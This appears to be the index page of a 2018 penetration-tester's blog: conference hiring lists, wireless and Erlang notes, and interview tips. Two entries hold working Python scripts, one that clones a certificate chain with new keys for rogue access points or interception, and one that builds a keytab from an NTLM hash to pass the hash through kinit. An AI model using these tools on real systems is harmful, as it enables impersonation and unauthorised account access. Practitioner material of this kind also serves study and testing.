Posts

Dec 15, 2018

Created the 2018 UNOFFICIAL ShmooCon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/I4sbeEpxMwNI6qn33
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Oct 14, 2018

I have a bit of a feature request for all wireless assessment tools out there:
Many times before arriving on site for an assessment, I'll know the ESSIDs of a target wireless network for a client. Getting channels and BSSIDs isn't usually an option. Also, many times during the assessment I'm performing there are physical aspects to it, like guards or cameras, so sitting down in the lobby and typing out commands to de-auth that client or BSSID isn't really great OPSEC.

Sep 15, 2018

Erlang is a programming language that I have tried to learn a few times in the past but never really dug in, that is, until recently.
Erlang is an interesting language because it has “built-in concurrency, distribution, and fault tolerance”. To me, this means that it does job queuing and distributed tasks right out of the gate.
A little bit of history: I first started digging into Erlang again from an attacker's point of view at BSides Philadelphia 2016, where I talked about SolarWinds ORION.

Sep 9, 2018

Created the 2018 UNOFFICIAL Kiwicon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/hfftscOGBWp14Ust1
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Sep 1, 2018

Created the 2018 UNOFFICIAL DerbyCon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/K6kfOY5dHH6lcQm63
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Aug 26, 2018

At Def Con 26, @singe and @_cablethief gave a talk on enterprise wireless attacks. When its video is released you should check it out.
During that talk, they quickly touched on "Apostille", a tool written by Rogan Dawes, another @Sensepost-er. It is essentially a certificate-stealing (cloning? faking? doppelganger-ing?) tool. However, that oversimplifies what it does.
To be more accurate, Apostille generates a clone of the certificate chain, identical in as many details as possible, apart from the actual key values.
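To make the "identical apart from the key values" idea concrete, here is an added example written for this page; it is not Apostille's code and does not claim to match its behaviour in detail. It takes a chain (leaf first, root last), mints a fresh key of the same type and size for every certificate, copies subject, issuer, serial, validity and extensions verbatim, and re-signs each cert with the cloned issuer's new key. It goes one step beyond the post's description by recomputing the Subject/Authority Key Identifier extensions, since those are hashes of the key material and would otherwise betray the swap. It needs the `cryptography` package; the two-certificate sample chain (Example Root CA, www.example.com) is constructed in the script so it runs offline.

```python
"""Clone an X.509 chain: same names, serials, dates and extensions, new keys.

Added example for this page, not Apostille's own code. Requires `cryptography`.
The sample chain below is constructed here and stands in for a real target.
"""
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec, padding, rsa
from cryptography.x509.oid import NameOID


def _fresh_key_like(pub):
    """New private key with the same algorithm and size as the original public key."""
    if isinstance(pub, rsa.RSAPublicKey):
        return rsa.generate_private_key(65537, pub.key_size)
    if isinstance(pub, ec.EllipticCurvePublicKey):
        return ec.generate_private_key(pub.curve)
    raise TypeError("unsupported key type: %r" % type(pub))


def _validity(cert):
    # cryptography >= 42 prefers the *_utc accessors; fall back on older releases
    nb = getattr(cert, "not_valid_before_utc", None) or cert.not_valid_before
    na = getattr(cert, "not_valid_after_utc", None) or cert.not_valid_after
    return nb, na


def clone_chain(chain):
    """chain: certs leaf-first, root last. Returns [(cloned_cert, new_key), ...]
    in the same order; each cert is re-signed by the cloned issuer's new key."""
    cloned, signer_key = [], None
    for cert in reversed(chain):                      # walk root -> leaf
        new_key = _fresh_key_like(cert.public_key())
        if signer_key is None:
            signer_key = new_key                      # root stays self-signed
        nb, na = _validity(cert)
        builder = (x509.CertificateBuilder()
                   .subject_name(cert.subject)
                   .issuer_name(cert.issuer)
                   .public_key(new_key.public_key())
                   .serial_number(cert.serial_number)
                   .not_valid_before(nb)
                   .not_valid_after(na))
        for ext in cert.extensions:
            val = ext.value
            # SKI/AKI are hashes of key material: recompute for the new keys
            if isinstance(val, x509.SubjectKeyIdentifier):
                val = x509.SubjectKeyIdentifier.from_public_key(new_key.public_key())
            elif isinstance(val, x509.AuthorityKeyIdentifier):
                val = x509.AuthorityKeyIdentifier.from_issuer_public_key(
                    signer_key.public_key())
            builder = builder.add_extension(val, ext.critical)
        new_cert = builder.sign(signer_key, cert.signature_hash_algorithm)
        cloned.append((new_cert, new_key))
        signer_key = new_key                          # signs the next cert down
    cloned.reverse()
    return cloned


def issued_by(cert, issuer):
    """True if the issuer's public key verifies cert's signature."""
    pub = issuer.public_key()
    try:
        if isinstance(pub, rsa.RSAPublicKey):
            pub.verify(cert.signature, cert.tbs_certificate_bytes,
                       padding.PKCS1v15(), cert.signature_hash_algorithm)
        else:
            pub.verify(cert.signature, cert.tbs_certificate_bytes,
                       ec.ECDSA(cert.signature_hash_algorithm))
        return True
    except InvalidSignature:
        return False


def spki(cert):
    """DER SubjectPublicKeyInfo, handy for showing the key really changed."""
    return cert.public_key().public_bytes(
        serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo)


def sample_chain():
    """Constructed [leaf, root] chain; names and serials are made up."""
    now = datetime.datetime(2018, 8, 1, tzinfo=datetime.timezone.utc)
    root_key = ec.generate_private_key(ec.SECP256R1())
    root_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Example Root CA")])
    root = (x509.CertificateBuilder()
            .subject_name(root_name).issuer_name(root_name)
            .public_key(root_key.public_key()).serial_number(0x1001)
            .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=3650))
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), True)
            .add_extension(x509.SubjectKeyIdentifier.from_public_key(root_key.public_key()), False)
            .sign(root_key, hashes.SHA256()))
    leaf_key = ec.generate_private_key(ec.SECP256R1())
    leaf = (x509.CertificateBuilder()
            .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "www.example.com")]))
            .issuer_name(root_name)
            .public_key(leaf_key.public_key()).serial_number(0x2002)
            .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=365))
            .add_extension(x509.SubjectAlternativeName([x509.DNSName("www.example.com")]), False)
            .add_extension(x509.AuthorityKeyIdentifier.from_issuer_public_key(root_key.public_key()), False)
            .sign(root_key, hashes.SHA256()))
    return [leaf, root]


if __name__ == "__main__":
    leaf, root = sample_chain()
    (c_leaf, _), (c_root, _) = clone_chain([leaf, root])
    print("subject kept:", c_leaf.subject == leaf.subject)
    print("key changed:", spki(c_leaf) != spki(leaf))
    print("valid under cloned root:", issued_by(c_leaf, c_root),
          "valid under real root:", issued_by(c_leaf, root))
```

The point the clone makes is the same one the talk made: everything a human (or a lazy validator that only compares names, serials and dates) looks at is unchanged, while the chain only verifies against the cloned root, which is exactly what a rogue access point or interception proxy would present. Any pinning or trust-store check that anchors on the real root's key still fails, which is the property you are testing for.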

Jul 27, 2018

Created the 2018 UNOFFICIAL BlackHat, DEF CON, BSidesLV Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/dIjQHTPLk7ZYyv5D2
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Jul 24, 2018

This blog post may be of limited use; most of the time, when you have an NTLM hash, you also have the tools to use it. But if you find yourself in a situation where you don't have those tools and do happen to have Kerberos tools, you can pass the hash with them.
Let's say we have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step is to create a keytab file using ktutil:
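The reason this works at all is that for Kerberos enctype 23 (arcfour-hmac, RFC 4757) the long-term key is literally the NT hash, so a keytab holding that hash is as good as the password. The following added example (not the post's ktutil walkthrough) writes such a keytab directly in the MIT version-2 file format and parses it back to verify the contents. The user and hash are the ones from the post; the realm EXAMPLE.COM and the output filename are assumptions.

```python
"""Write an MIT v2 keytab whose single key is an NT hash (enctype 23).

Added example for this page; not the original post's ktutil steps. The
realm EXAMPLE.COM and the file name uberuser.keytab are assumptions.
"""
import struct
import time
from typing import Optional

KEYTAB_MAGIC = b"\x05\x02"   # MIT keytab file format, version 2
ETYPE_ARCFOUR_HMAC = 23      # RFC 4757 RC4-HMAC: the key bytes are the NT hash
KRB5_NT_PRINCIPAL = 1        # principal name type


def _counted(data: bytes) -> bytes:
    """Keytab 'counted octet string': 16-bit big-endian length, then bytes."""
    return struct.pack(">H", len(data)) + data


def _read_counted(blob: bytes, pos: int):
    (n,) = struct.unpack_from(">H", blob, pos)
    return blob[pos + 2:pos + 2 + n], pos + 2 + n


def build_keytab(principal: str, realm: str, nt_hash_hex: str,
                 kvno: int = 1, timestamp: Optional[int] = None) -> bytes:
    """Return a complete keytab with one arcfour-hmac entry for principal@realm."""
    key = bytes.fromhex(nt_hash_hex)
    if len(key) != 16:
        raise ValueError("NT hash must be 16 bytes (32 hex characters)")
    components = principal.split("/")            # e.g. host/www -> two parts
    body = struct.pack(">H", len(components))    # number of name components
    body += _counted(realm.encode())
    for part in components:
        body += _counted(part.encode())
    body += struct.pack(">I", KRB5_NT_PRINCIPAL)
    body += struct.pack(">I", int(time.time()) if timestamp is None else timestamp)
    body += struct.pack(">B", kvno & 0xFF)       # 8-bit key version number
    body += struct.pack(">H", ETYPE_ARCFOUR_HMAC) + _counted(key)
    body += struct.pack(">I", kvno)              # optional 32-bit kvno extension
    return KEYTAB_MAGIC + struct.pack(">i", len(body)) + body


def parse_keytab(blob: bytes) -> list:
    """Parse a version-2 keytab into dicts; used here to check what we wrote."""
    if blob[:2] != KEYTAB_MAGIC:
        raise ValueError("not a version-2 keytab")
    pos, entries = 2, []
    while pos + 4 <= len(blob):
        (size,) = struct.unpack_from(">i", blob, pos)
        pos += 4
        if size < 0:                 # negative size marks a deleted slot
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        realm, pos = _read_counted(blob, pos)
        parts = []
        for _ in range(ncomp):
            part, pos = _read_counted(blob, pos)
            parts.append(part.decode())
        _name_type, ts, kvno = struct.unpack_from(">IIB", blob, pos)
        pos += 9
        (etype,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        key, pos = _read_counted(blob, pos)
        if end - pos >= 4:           # 32-bit kvno present: it overrides the 8-bit one
            (kvno,) = struct.unpack_from(">I", blob, pos)
        pos = end
        entries.append({"principal": "/".join(parts) + "@" + realm.decode(),
                        "etype": etype, "kvno": kvno,
                        "key": key.hex(), "timestamp": ts})
    return entries


if __name__ == "__main__":
    kt = build_keytab("uberuser", "EXAMPLE.COM",
                      "88e4d9fabaecf3dec18dd80905521b29")
    with open("uberuser.keytab", "wb") as f:   # file name is an assumption
        f.write(kt)
    print(parse_keytab(kt))
```

With the file written, `kinit -k -t uberuser.keytab uberuser@EXAMPLE.COM` asks the KDC for a TGT using the hash alone and `klist` should show the ticket. Two caveats a practitioner will hit: the KDC has to be willing to issue RC4 for that account (an AD account restricted to AES through msDS-SupportedEncryptionTypes will refuse), and the client's krb5.conf must not have disabled the arcfour-hmac enctype.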

Jul 22, 2018

In early August of 2017 I posted a few tips to Twitter regarding interviewing and getting hired in general. I'm pasting them here to preserve them. I only had 140 characters to make these, and I think there is a lot more you can do, but 30 tips is a good start.
Don't post obvious CFAA violations to social media
If you go in without a job and a chip on your shoulder, you'll leave the same way
If you don't ask follow up questions, I won't have any either, like "would you like the job?

Jul 9, 2018

For nearly a year I left a CoinHive miner up on the blog so that people that didn't feel like or couldn't afford a way to support the blog could do so via a bit of CPU power. Unfortunately during that time lots of malware started to use services like CoinHive and I quickly started receiving warnings that my site had been "hacked" or was showing up as malicious (har har).